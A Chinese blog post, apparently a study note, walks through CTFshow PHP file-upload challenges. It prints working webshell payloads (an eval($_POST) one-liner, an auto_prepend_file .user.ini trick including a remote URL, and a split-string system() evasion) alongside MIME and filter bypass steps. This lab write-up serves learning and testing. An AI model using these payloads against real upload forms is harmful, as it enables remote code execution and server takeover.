Web安全--文件上传漏洞--通用漏洞--PHP

最新推荐文章于 2024-02-07 21:58:56 发布
最新推荐文章于 2024-02-07 21:58:56 发布
阅读量702 收藏 2
点赞数 1
文章标签: web安全 php 安全 网络安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68243135/article/details/127900339
版权

知识点:

1.文件上传--前端验证(如果是纯前端验证,那么我们可以直接检查元素修改代码即可绕过上传)

2.文件上传-黑白名单(意思就是网站设立黑白名单,允许上传什么类型文件等)

3.文件上传-.user.ini的妙用

4.文件上传-PHP语言特性

本文分享全部基于PHP的语言

详细点:

1.检测层面:前端,后端等

2.检测内容:文件头,完成性,二次渲染等

3.检测后缀:黑名单,白名单、MIME检测等

4.绕过技巧:多后缀解析,截断,中间件特性,条件竞争等

前置知识点:这里给大家说明一个问题,因为我在学的时候也思考很久。假如我们上传后门代码需要用特定格式后缀解析,不能以图片后缀解析脚本后门代码(解析漏洞除外),如:我们上传后门文件格式为jpg,图片里边有后门代码,不能被触发,所以连接不上后门。

案例演示:CTFSHOW--文件上传

151:改关卡为纯前端验证,查看源代码允许上传png格式,我们直接修改为PHP后,直接上传php后门代码成功。

152:同上操作后提示文件类型不合规,我们简单抓包发现MIME检测,直接修改Content-Type: image/png,成功上传。

153:js验证+.user.ini

.user.ini不过多介绍自行百度,我们上传.user.ini文件,内容为auto_prepend_file=test.png,这句话什么意思呢?说白了这是将test.png当作代码执行,正如前期所说直接上传png图片后门是不会执行的,但是这里我们用到.user.ini后就能将图片后门当作代码执行。

154-155:js验证+.user.ini+短标签

我们知道php代码都有<?php?>这样的格式,那么不加标签要怎么运行php呢(因为过滤的php关键字段,我们不能写完整的代码,就得用到短标签绕过)

<? echo '123';?>                                             //前提是开启配置参数short_open_tags=on

<?=(表达式)?>                                               //不需要开启参数设置

<% echo '123';%>                                          //前提是开启配置参数asp_tags=on

<script language=”php”>echo '1'; </script>   //不需要修改参数开关

步骤:同上+短标签

.user.ini:auto_prepend_file=test.png

test.png:<?=eval($_POST[x]);?>

163 突破上传删除

过滤 . () {} ;等 同时文件被删除

直接利用.user.ini包含远程

auto_prepend_file=http://794750069/

auto_prepend_file=http://794750069/

解题方法:条件竞争可以解题但是这关不需要用到条件竞争。(当上传什么文件都删除时才用到条件竞争),条件竞争是没上传之前一直发包确保在上传成功后,在服务器没有删除之前访问到。

文件二次渲染:

1、判断上传前和上传后的文件大小及内容

2、判断上传后的文件返回数据包内容

164 png二次渲染(以后经常碰到的情况):意思就是上传的图片被网站加工处理,会把里边的代码进行修改,这就是二次渲染。

文件上传之二次渲染绕过_qq_40800734的博客-CSDN博客_图片二次渲染    (该网站是利用代码脚本生成渲染图片后门的,手工也可以自己生成但是有难度。但是脚本代码生成的图片也不是一定可以)

get 0=system

post 1=tac flag.php

168 免杀后门

<?php $a='syste';$b='m';$c=$a.$b;$c('tac ../flagaa.php');?>

这题是写不进去,当我们上传关键代码时会直接被删除(或者可以说写不进去),解决办法就是我们直接把关键的代码进行分割。

上传成功后直接访问该目录即可

 

 文件上传还有很多配合中间件的解析漏洞上传的,这里不再过多介绍。

LaPluie985
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
《安天365安全研究》-2017-04.pdf
08-07
目录 第 1 部分拟研究技术专题 1.1《黑客攻防实战——web 漏洞挖掘与利用》图书 1.2 安天实战课题研究 2017 年第二期内网渗透技术题目 1.3 关于安天 365 线下和线下交流 1.4 已出版图书 第 2 部分技术研究文章 2.1 利用 phpcms 后台漏洞渗透某色情网站 2.1.1 扫描及分析端口信息 2.1.2 网站 cms 识别。 2.1.3 可利用信息分析和测试 2.1.4 端口信息测试 2.1.5phpsso_server 后台管理 2.1.6 获取 webshell 尝试 2.1.7 后续数据分析 2.1.8 总结 2.2 渗透某“高大尚”车友会网站 2.2.1 通过关键字寻找渗透目标 2.2.2.在论坛注册一个账号 2.2.3.编辑漏洞利用模板 2.2.4.获取管理密码加密等信息 2.2.5.获取数据库信息 2.2.6.进入管理后台 2.2.7.通过插件漏洞直接获取 webshell 2.3 获取并破解 windows 系统密码 2.3.1 获取系统 sam 和 system 文件 2.3.2 导入 sam 和 system 和文件 2.3.3 使用 ophcrack 进行密码破解 2.3.4 通过网站在线破解 2.4Mysql root 账号 general_log_file 方法获取 webshell 2.4.1 信息收集 2.4.2.获取 root 账号和密码 2.4.3.直接导出 webshell 失败 2.4.4. secure_file_priv 选项 2.4.5.通过 general_log 和 general_log_file 来获取 webshell 2.4.6.获取 webshell 2.4.7.服务器密码获取 2.4.8.获取远程终端端口 2.4.9.登录 3338 2.4.10.总结 2.5 从目录信息泄露到渗透内网 2.5.1.目录信息泄露 2.5.2.发现后台弱口令 2.5.3.泄露文件信息 2.5.4.发现数据库文件 2.5.5.发现涉及个人隐私的文件 2.5.6.发现上传文件模块 2.5.7.构造文件解析漏洞 2.5.8.获取数据库密码 2.5.9.MSSQL 数据库直接提权 2.5.10.使用 lcx 穿透进入内网 2.5.11.查看和扫描内网 2.5.12.利用已有信息进行渗透 2.5.13.目录信息泄露防范 2.6Acesss 数据库手工绕过通用代码防注入系统 2.6.1 获取目标信息 2.6.2 测试是否存在 SQL 注入 2.6.3 绕过 SQL 防注入系统 2.6.4 获取数据库类型以及表和字段 2.6.5 获取管理员密码 2.6.6.获取数据库 2.6.7access 数据库获取 webshell 方法 2.6.8 参考文章 2.7 网易 52G 邮箱帐号数据泄露追踪与还原 2.7.1 获取样本数据 2.7.2 查看样本数据 2.7.3 数据库还原 2.7.4 数据统计 2.7.5 结论与安全建议 2.7.6 参考文章 2.8WINDOWS 高危端口加固实践 2.8.1 屏蔽 135 端口 2.8.2 加固 137、138 和 139 端口 2.8.3445 端口加固 2.8.43389 端口加固 2.8.5 主机加固小结 2.9Linux(CentOS)之 iptables 访问控制 2.9.1 打开配置文件 2.9.2 添加新的放行端口 2.9.3 重启 iptables 使配置生效 2.9.4 查看端口开放情况 2.9.5 测试端口开放情况 2.9.6 小结
UPUPW PHP探针通用版 18.7.9.zip
05-24
UPUPW PHP探针通用版,优势:支持最新PHP7.2系列版本,完全兼容PHP5.2-PHP5.6组件和参数的检测,防XSS漏洞攻击。 功能列表: 1.支持服务器域名及端口检测;2.支持服务器环境webserver检测;3.支持php版本检测;4.支持php配置文件路径检测;5.支持当前网站路径检测;6.支持服务器时间检测;7.支持查看phpinfo详细页面;8.支持php常规组件MySQLi.cURL.GD.EXIF.OpenSSL.Mcrypt.IMAP.SendMail开启状态检测;9.支持PHP Zend解密组件Zend Optimizer.Zend GuardLoader.ionCubeLoader开启状态检测;10.支持PHP 缓存优化组件XCache.OPcache.Memcache开启状态检测;11.支持PHP重要参数Memory限制.Upload限制.POST限制.Execution超时.Input超时.Socket超时检测;12.支持PHP全部已编译模块组件显示;13.支持数据库连接测试;14.支持页面执行时间和消耗内存的检测。
PHP文件上传漏洞的前因后果
最新发布
cul1n的博客
02-07 1175
文件上传是常见的网络服务提供点,我们面对文件上传的时候,其实思路不只是去拿到Webshell,也可以根据其服务提供的特点,尝试去挖掘XSS或者其他方面的漏洞,不失为一种好的选择,本篇文章对文件上传PHP代码的基础做了详细的介绍,旨在告诉初学者常见的文件上传类型及原理,开发者是如何部署文件上传服务的,以及如何常见的过滤手法是什么,希望这篇文章能够对初学者有所帮助
phpweb通用上传漏洞
05-16
phpweb通用上传漏洞 一键GETshell 不用多解释了
ThinkPHP 3.2.3 核心版.zip
05-23
ThinkPHP是一个免费开源的,快速、简单的面向对象的 轻量级PHP开发框架,创立于2006年初,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP 3.2.3 核心版 更新日志:2014-12-24 [数据库方面]数据库驱动完全用PDO重写;支持通用insertAll方法;改进参数绑定机制;主从分布式数据库连接改进;对Mongo的支持更加完善;[模型方面]模型类的诸多增强和改进;增加聚合模型扩展;支持复合主键;多表操作的支持完善;模型的CURD操作支持仅获取SQL语句而不执行;增加using/index/fetchSql/strict/token连贯操作方法;模型类的setInc和setDec方法支持延迟写入;[安全方面]I函数增加变量修饰符和正则检测支持;支持全局变量过滤和Action参数绑定的变量过滤;修正可能的SQL注入漏洞;[其它方面]支持全局路由定义;增加插件控制器支持;增加对全局和模块的模板路径的灵活设置;日志目录分模块存放;增加memcacheSession驱动;改进session函数的数组操作;修正一系列存在的问题;
文件上传绕过】--二次渲染
nareku的博客
04-07 8248
二次渲染原理 在我们上传文件后,网站会对图片进行二次处理(格式、尺寸,保存,删除 要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行显示。 绕过方法 1.配合条件竞争漏洞 ...
PHP_file_upload_vlun:PHP文件上传漏洞
05-14
#PHP文件上传漏洞的源代码
DVWA之PHP文件上传漏洞(File Upload)
热门推荐
Mi1k7ea
01-22 1万+
文件上传漏洞是指由于服务器对于用户上传部分的控制不严格导致攻击者可以上传一个恶意的可执行的文件到服务器。简单点说,就是用户直接或者通过各种绕过方式将webshell上传到服务器中进而执行利用。 首先保存一句话木马为1.php文件: 另外对于上传的文件,可在DVWA的服务器中(本人用的是Metasploitable虚拟机)以下路径找到: /var/www/dvwa/hackab
PHP文件上传漏洞
BrosyveryOK的博客
11-28 2101
上礼拜一直在搞期中测试和unctf,没啥时间整理,这礼拜继续整理!
PHP漏洞全解(九)-文件上传漏洞
weixin_34072637的博客
02-13 143
一套web应用程序,一般都会提供文件上传的功能,方便来访者上传一些文件。 下面是一个简单的文件上传表单 <form action="upload.php" method="post" enctype="multipart/form-data" name="form1"> <input type="file" name="file1" />&l...
你不知道的文件上传漏洞php代码分析
12-18
漏洞描述 开发文件上传功能很常见,作为开发者,在完成功能的基础上我们一般也要做好安全防护。 文件处理一般包含两项功能,用户上传和展示文件,如上传头像。 文件上传攻击示例 upload.php <?php $uploaddir = 'uploads/'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)){ echo "File is valid, and was suc
UPUPW PHP探针通用版 v15.12.3.zip
07-06
UPUPW PHP探针通用版,优势:支持最新PHP7.0系列版本,完全兼容PHP5.2-PHP5.6组件和参数的检测,防XSS漏洞攻击。 UPUPW PHP探针通用版功能列表: 01、支持服务器域名及端口检测。 02、支持服务器环境webserver检测...
第三十二天:文件上传&二次渲染&.htaccess&变异免杀
m0_51322401的博客
02-05 232
include’http://794750069/'> //这里的http://794750069/是一个包含一句话木马的网页。原文链接:https://blog.csdn.net/hesysd/article/details/127979999。如果要图片后缀解析脚本代码,一般会利用包含漏洞或解析漏洞,还有.user.ini&.htaccess。1.直接全部都删除,这种就只能通过条件竞争(即通过快速访问文件,让文件的进程被占用,导致无法删除)4、绕过技巧:多后缀解析,截断,中间件特性,条件竞争等。
WEB漏洞攻防 - 文件上传漏洞 - 文件内容检测绕过
利他者利己,利己者无功。利他利己,利己利他。
09-02 1729
通过在文件中添加正常文件的标识或其他关键字符绕过。
文件上传漏洞
m0_70683009的博客
05-21 1087
如果对方中间件是apache属于低版本,我们可以利用文件上传,上传一个不识别的文件后缀,利用解析漏洞规则成功解析文件,其中的后门代码被执行。,可以被当作php文件进行解析,从最后一个.mmm开始,apache不认识,就往前走,一直到.php,这样即绕过了验证,有可以进行解析。⑤:不删除末尾的点,在后缀名加点(需要在抓到的数据包中加点,直接在文件后缀名加点会命名不成功,它会自动删除点)(2) 当上传文件.asp;上传可以上传的文件,在文件地址后加上/x.php,可以让文件php代码去执行。
php同步 图片回显,php后门插在图片里执行回显思路
weixin_35450193的博客
03-10 127
作者:lcx有的网站不检查后缀格式,但检查文件头很严格,gif89a根本骗不过去,只能copy/b 1.gif+1.php 2.php这样.但一句话php木马或inulcde之类的就不会有回显了.而且把php代码插在图片里,如果不知那个网站目录有写权限的话,也很难写文件上去.当然用NC抓包提交可以看到回显,但是太罗嗦了.下边的代码只能算个poc了.php:COMMANDE PHP :(pas de...
php 上传文件漏洞,【文件上传PHP文件上传漏洞
weixin_42309083的博客
03-09 568
0x01 文件上传漏洞文件上传漏洞顾名思义就是用户上传一个可执行的脚本文件,获得了执行服务器端命令的能力。通常,文件上传是getshell最常用、最直接的方式了。但是,文件上传本身是一个正常的业务需求,因此问题在于如何安全的上传。0x02 文件上传的触发条件上传的文件Web容器解释执行用户能够从web页面访问到被上传的文件(直接或间接)用户上传的文件通常不能被网站程序压缩、修改内容0x03 从防...
泛微 e-cology 前台文件上传漏洞
07-28
泛微e-cology前台文件上传漏洞是指在泛微e-cology系统的前台功能中存在漏洞,攻击者可以利用该漏洞上传恶意文件到服务器上。根据引用\[1\]中提到的CNVD-2020-33199漏洞编号,该漏洞可能存在于泛微e-cology9版本的前台文件上传功能中。具体触发点位于文件/global_search.php的第108行,调用了doc2text()函数,并追溯到doc2txt()函数中的$FILE_PATH参数的源代码。该参数连接了附件目录(C:\eoffice9\webroot\ATTACHMENT)的数据表FLE_CONTENT中ATTACHMENT_ID和ATTACHMENT_NAME列的值,以获取完整的文件路径。\[2\] 需要注意的是,根据引用\[3\]中的声明,本文提供的信息仅供网络安全人员参考,未经授权请勿利用文章中的技术资料进行任何入侵操作。同时,禁止将本文提供的工具用于其他目的。 #### 引用[.reference_title] - *1* [泛微e-cology9前台文件上传漏洞复现](https://blog.csdn.net/qq_41490561/article/details/116119845)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [泛微E-Office前台文件上传漏洞](https://blog.csdn.net/u010025272/article/details/131312528)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值